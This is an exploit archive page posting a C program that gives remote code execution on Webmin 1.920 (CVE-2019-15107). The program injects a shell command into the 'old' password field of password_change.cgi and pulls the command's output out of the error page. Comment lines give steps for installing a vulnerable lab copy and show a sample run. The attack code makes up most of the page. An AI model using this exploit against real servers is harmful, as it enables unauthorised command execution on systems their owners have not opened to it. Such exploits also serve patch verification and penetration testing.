Webmin 1.920 Remote Code Execution

Webmin 1.920 Remote Code Execution: Posted Sep 15, 2019; Authored by BoSSaLiNiE; Webmin version 1.920 remote code execution exploit that leverages the vulnerability noted in CVE-2019-15107.; tags | exploit, remote, code execution; advisories | CVE-2019-15107; SHA-256 | 233192a3d19175ea1314a59b24a433a47278e7d0fd3f5a72f4fdeb8334763b0e; Download | Favorite | View

Webmin 1.920 Remote Code Execution

////////////////////////////////////////////////////////////////////////////////////////////////
// Webmin 1.920 Remote Code Execution Exploit CVE_2019_15107.c muBoT Cut
// written in C by BoSSaLiNiE
//
// Step 1
// wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
//
// Step 2
// dpkg -i webmin_1.920_all.deb
//
//
// Step 3
// sed -i s/passwd_mode=0/passwd_mode=2/g /etc/webmin/miniserv.conf;service webmin restart
//
// Step 4
// gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
//
// ./CVE_2019_15107 10.0.0.14 "uptime"
// https://10.0.0.14:10000/password_change.cgi
// 16:16:38 up 22:15,  0 user,  load average: 0.00, 0.00, 0.00
//
///////////////////////////////////////////////////////////////////////////////////////////////

#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

int main(int argc,char* argv[])
{
  CURLU *h;
  CURL *curl;
  CURLcode res;
  struct sockaddr_in servaddr;  /*  socket address structure  */ 
  curl_socket_t sockfd;

  char buffer[200];
  char scanip[20];
  char *host;
  char *path;
  char ref[100];
  char url[100];


  struct string {
    char *ptr;
    size_t len;
  };

  void init_string(struct string *s) {
    s->len = 0;
    s->ptr = malloc(s->len+1);
    if (s->ptr == NULL) {
      fprintf(stderr, "malloc() failed\n");
      exit(EXIT_FAILURE);
    }
    s->ptr[0] = '\0';
  }

  size_t writefunc(void *ptr, size_t size, size_t nmemb, struct string *s)
  {
    size_t new_len = s->len + size*nmemb;
    s->ptr = realloc(s->ptr, new_len+1);
    if (s->ptr == NULL) {
      fprintf(stderr, "realloc() failed\n");
      exit(EXIT_FAILURE);
    }
    memcpy(s->ptr+s->len, ptr, size*nmemb);
    s->ptr[new_len] = '\0';
    s->len = new_len;

    return size*nmemb;
  }


  curl_global_init(CURL_GLOBAL_DEFAULT);
  curl = curl_easy_init();

  if(curl) {
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 1L);
    struct curl_slist *headers=NULL;


    struct string s;
    init_string(&s);

    headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate");
    headers = curl_slist_append(headers, "Accept: */*");
    headers = curl_slist_append(headers, "Accept-Language: en");
    headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)");
    headers = curl_slist_append(headers, "Connection: close");
    headers = curl_slist_append(headers, "Cookie: redirect=1; testing=1; sid=x; sessiontest=1");
    //  headers = curl_slist_append(headers, "Referer: https://192.168.233.134:10000/session_login.cgi");      
    headers = curl_slist_append(headers, "Content-Type: application/x-www-form-urlencoded");
    headers = curl_slist_append(headers, "Content-Lenght: 60");
    headers = curl_slist_append(headers, "cache-control: no-cache");

    sprintf(url, "https://%s:10000/password_change.cgi", argv[1]);
    sprintf(ref, "https://%s:10000/session_login.cgi", argv[1]);

    curl_easy_setopt(curl, CURLOPT_REFERER, ref);
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers );
    curl_easy_setopt(curl, CURLOPT_VERBOSE, 0);
    curl_easy_setopt(curl, CURLOPT_URL, url);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writefunc);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &s);

    char b64str[100000] = {0};
    sprintf(b64str, "user=rootxx&pam=&expired=2&old=%s&new1=test2&new2=test2",argv[2]);

    curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, "POST");
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, b64str);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0);
    //  curl_easy_setopt (curl, CURLOPT_TIMEOUT, 10L);

    res = curl_easy_perform(curl);

    //////////////////////////FILTER//////////////////////////

    //  puts(s.ptr);
    const char *x = s.ptr;
    const char *PATTERN1 = "<center><h3>Failed to change password : The current password is incorrect";
    const char *PATTERN2 = "</h3></center>";

    char *target = NULL;
    char *start, *end;

    if ( start = strstr( x, PATTERN1 ) )
    {
      start += strlen( PATTERN1 );
      if ( end = strstr( start, PATTERN2 ) )
      {
        target = ( char * )malloc( end - start + 1 );
        memcpy( target, start, end - start );
        target[end - start] = '\0';
      }
    }

    if ( target ) 
      puts(url);
    puts( target );

    free( target );

    free(s.ptr);


  }
  return 0;
}

Top Authors In Last 30 Days

Red Hat 250 files
Ubuntu 111 files
indoushka 49 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,085)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,603)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,724)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

Webmin 1.920 Remote Code Execution

Webmin 1.920 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Webmin 1.920 Remote Code Execution

Share This

Webmin 1.920 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems